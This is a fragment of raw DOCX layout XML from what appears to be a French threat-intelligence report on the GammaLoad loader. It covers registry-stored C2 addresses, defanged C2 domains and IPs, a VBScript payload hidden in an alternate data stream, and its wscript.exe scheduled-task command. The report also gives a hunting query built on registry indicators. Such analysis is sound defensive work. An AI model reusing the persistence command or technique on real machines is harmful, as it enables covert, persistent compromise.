            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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0176" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>2163445</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>6798319</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="199390"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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2224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6798319</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="199390"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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4512" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>2324735</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>6798319</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2510793" cy="199390"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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079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0790" h="199390">
                          <a:moveTo>
                            <a:pt x="2066289" y="199390"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="2066289" y="0"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="2510790" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="2510790" y="199390"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="1015999" y="199390"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1015999" y="0"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="1705610" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1705610" y="199390"/>
                          </a:lnTo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854710" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="85471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758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860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9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6168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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Lors de son exécution,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écrit dans le registre deux valeurs C2 codées en dur qu’il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0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94497" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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4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utilisera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168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1406155</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5565023" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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La valeur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38"/>
                            <w:u w:val="single" w:color="000000"/>
                          </w:rPr>
                          <w:t xml:space="preserve">hxxps://vids-road-ch</w:t>
                        </w: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ristina-guards.trycloudflare[.]com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écrite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2704" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>1711325</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>1607408</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2018410" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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84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HKCU\Console\HistoryURL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372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1609113</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="377682" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="12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68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475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1807233</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1361106" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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11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387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4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valeur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5776" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>3068472</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>1804300</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1762067" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="12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20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39"/>
                            <w:u w:val="single" w:color="000000"/>
                          </w:rPr>
                          <w:t xml:space="preserve">hxxp://1</w:t>
                        </w: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72.86.72[.]243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0" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>5407494</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>1807233</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1329738" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="12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7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écrite</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle08"/>
                            <w:spacing w:val="38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7824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2005553</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2384943" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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494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HKCU\Console\WindowsResponby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8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2294278</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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utilise le même mécanisme de requêtes GET en cascade et les mêmes clés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9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2467633</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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registre que ceux observés lors des premières étapes. Il donne la priorité aux valeurs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0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2640988</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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registre mises en cache avant de se rabattre sur le DDR. Il est à noter que le seul domaine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1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2811410</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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codé en dur est </w:t>
                        </w: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dayobtvoyu[.]ru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La gestion des codes de statut HTTP 200 OK et 404 Not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2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2994048</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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Found reste cohérente avec les étapes précédentes. Cependant, plutôt que d’exécuter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3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3167403</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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l’étape suivante en mémoire,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décode le script VBScrip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t provenant du C2 et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écrit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4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3359373</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5419608" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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960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charge utile nettoyée dans un fichier ADS situé à l’emplacement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%TEMP%\:divedz0f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6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3660798</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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Une fois la charge utile écrite avec succès dans l'ADS,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interrompt les interactions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3834153</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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réseau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et</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle08"/>
                            <w:spacing w:val="29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enregistre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une</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle08"/>
                            <w:spacing w:val="29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tâche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planifiée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nommée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806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4026123</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5817753" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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\Windows\ApplicationData\DsSvcCleanup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, configurée pour exécuter cet ADS toutes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9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4222773</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1013457" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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4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11 minutes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0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4517131</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4573702" cy="147587"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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3702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wscript.exe "%TEMP%\:divedz0f" [RANDOM ARGS] //b //e:vbscript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1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4958103</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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se termine après avoir créé la tâche planifiée. La charge utile exécutée par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2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5128525</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5793073" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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30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tâche planifiée a été récupérée en utilisant l'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endpoint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C2 </w:t>
                        </w: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hxxps://vids-road-christina-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3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5308230</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5733209" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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320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guards.trycloudflare[.]com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Il s'agit une nouvelle fois d'un chargeur, la troisième étape.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4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5868058</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1300585" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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5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Notes de l’analyste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5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6143013</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3535043" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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50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Identification de nouveaux échantillons GammaLoad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6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6417968</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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L'identification de nouveaux échantillons associés à GammaLoad a débuté par la recherche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6591323</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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de clés de registre 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ca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ractéristiques</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle08"/>
                            <w:spacing w:val="21"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> o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bservées lo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rs de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 l'analy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se de Sekoia. Les artefacts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830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6783293</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5816483" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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4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WindowsResponby</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle08"/>
                            <w:spacing w:val="61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HistoryURL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08"/>
                            <w:spacing w:val="-31"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> 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CloudURL</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle08"/>
                            <w:spacing w:val="62"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> et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IpURL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apparaissent de manière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9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6979943</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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récurrente dans les échantillons analysés et constituent des indicateurs suffisamment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0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7153298</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2535209" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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520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spécifiques pour servir de point de pivot.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7428253</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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La requête suivante a été utilisée afin de rechercher des fichiers présentant simultanément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2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7601608</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3039666" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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966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ces artefacts de persistance et de configuration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3424" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>3896093</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>7864345</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2886160" cy="158253"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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6160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behavior_registry:WindowsResponby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4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7864345</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="958033" cy="158253"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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803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5472" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>4482134</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>8034525</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2300118" cy="158253"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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0118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behavior_registry:CloudURL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6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8034525</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2382973" cy="158253"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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29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behavior_registry:HistoryURL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8204705</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1963873" cy="158253"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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8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behavior_registry:IpURL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8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8763658</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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Cette recherche a permis d'identifier plusieurs échantillons partageant le même ensemble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9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8937013</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2049612" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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961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d'indicateurs comportementaux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05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161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26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36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468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367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9604" cy="351155"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="12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351155">
                          <a:moveTo>
                            <a:pt x="3961129" y="351155"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5729604" y="351155"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5729604" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3961129" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3961129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3960494" y="351155"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="396049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697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1342399</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5760719" cy="3678555"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="12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678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678555">
                          <a:moveTo>
                            <a:pt x="0" y="3402329"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="3402329"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="3678555"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="3678555"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="3402329"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="2595245"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="2595245"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="3402964"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="3402964"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="2595245"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="1758314"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="1758314"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="2595245"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="2595245"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="1758314"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="1598295"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="1598295"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="1758314"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="1758314"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="1598295"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="3961764" y="1591945"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5730239" y="1591945"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5730239" y="1061720"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3961764" y="1061720"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3961764" y="1591945"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="635" y="1591945"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3961130" y="1591945"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3961130" y="1061720"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="635" y="1061720"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="635" y="1591945"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="3961764" y="1061084"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5730239" y="1061084"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5730239" y="530859"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3961764" y="530859"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3961764" y="1061084"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="635" y="1061084"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3961130" y="1061084"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3961130" y="530859"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="635" y="530859"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="635" y="1061084"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="3961764" y="530225"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5730239" y="530225"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5730239" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3961764" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3961764" y="530225"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="635" y="530225"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3961130" y="530225"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3961130" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="635" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="635" y="53022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00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5135889</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5729604" cy="696594"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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6965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696594">
                          <a:moveTo>
                            <a:pt x="4818379" y="696594"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5729604" y="696594"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5729604" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4818379" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4818379" y="696594"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="3333749" y="696594"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="4817745" y="696594"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4817745" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3333749" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3333749" y="696594"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="696594"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3333115" y="696594"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3333115" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="69659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15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5833119</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5729604" cy="3715384"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1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37153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3715384">
                          <a:moveTo>
                            <a:pt x="4818379" y="3715384"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5729604" y="3715384"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5729604" y="3185159"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4818379" y="3185159"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4818379" y="3715384"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="3333749" y="3715384"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="4817745" y="3715384"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4817745" y="3185159"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3333749" y="3185159"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3333749" y="3715384"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="3715384"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3333115" y="3715384"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3333115" y="3185159"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="3185159"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="3715384"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="4818379" y="3184525"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5729604" y="3184525"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5729604" y="2654300"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4818379" y="2654300"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4818379" y="3184525"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="3333749" y="3184525"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="4817745" y="3184525"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4817745" y="2654300"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3333749" y="2654300"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3333749" y="3184525"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="3184525"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3333115" y="3184525"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3333115" y="2654300"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="2654300"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="3184525"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="4818379" y="2653665"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5729604" y="2653665"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5729604" y="2123440"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4818379" y="2123440"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4818379" y="2653665"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="3333749" y="2653665"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="4817745" y="2653665"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4817745" y="2123440"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3333749" y="2123440"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3333749" y="2653665"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="2653665"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3333115" y="2653665"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3333115" y="2123440"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="2123440"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="2653665"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="4818379" y="2122804"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5729604" y="2122804"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5729604" y="1592580"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4818379" y="1592580"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4818379" y="2122804"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="3333749" y="2122804"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="4817745" y="2122804"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4817745" y="1592580"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3333749" y="1592580"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3333749" y="2122804"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="2122804"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3333115" y="2122804"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3333115" y="1592580"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="1592580"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="2122804"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="4818379" y="1591945"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5729604" y="1591945"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5729604" y="1061719"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4818379" y="1061719"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4818379" y="1591945"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="3333749" y="1591945"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="4817745" y="1591945"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4817745" y="1061719"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3333749" y="1061719"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3333749" y="1591945"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="1591945"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3333115" y="1591945"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3333115" y="1061719"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="1061719"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="1591945"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="4818379" y="1061084"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5729604" y="1061084"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5729604" y="530860"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4818379" y="530860"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4818379" y="1061084"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="3333749" y="1061084"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="4817745" y="1061084"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="4817745" y="530860"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3333749" y="530860"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3333749" y="1061084"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="1061084"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3333115" y="1061084"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3333115" y="530860"/>
